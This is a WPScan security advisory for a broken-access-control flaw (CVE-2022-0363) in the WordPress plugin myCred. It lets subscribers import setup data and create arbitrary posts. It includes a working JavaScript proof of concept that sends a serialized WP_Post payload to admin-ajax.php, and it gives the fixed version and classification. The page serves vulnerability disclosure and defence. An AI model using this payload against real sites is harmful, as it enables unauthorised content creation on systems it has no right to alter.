WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

myCred < 2.4.4 - Subscriber+ Arbitrary Post Creation

Description

The plugin does not have any authorisation and CSRF checks in the mycred-tools-import-export AJAX action, allowing any authenticated users, such as subscribers, to call it and import mycred setup, thus creating badges, managing points or creating arbitrary posts.

Proof of Concept

PoC for creating arbitrary posts:

let formData = new FormData;
formData.append('_file', new Blob(['{"badges":{"7":{"badge":"O:7:\\"WP_Post\\":3:{s:12:\\"post_content\\";s:4:\\"test\\";s:10:\\"post_title\\";s:4:\\"test\\";s:9:\\"post_type\\";s:4:\\"post\\";}"}}}']))
formData.append('action', 'mycred-tools-import-export');
formData.append('request_tab', 'setup');
formData.append('request', 'import');
fetch("/wp-admin/admin-ajax.php", {
  "body": formData,
  "method": "POST"
});

Affects Plugins

mycred
Fixed in version 2.4.3.1

References

CVE
CVE-2022-0363

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
a438a951-497c-43cd-822f-1a48d4315191

Timeline

Publicly Published

2022-03-29 (about 1 months ago)

Added

2022-03-29 (about 1 months ago)

Last Updated

2022-04-11 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin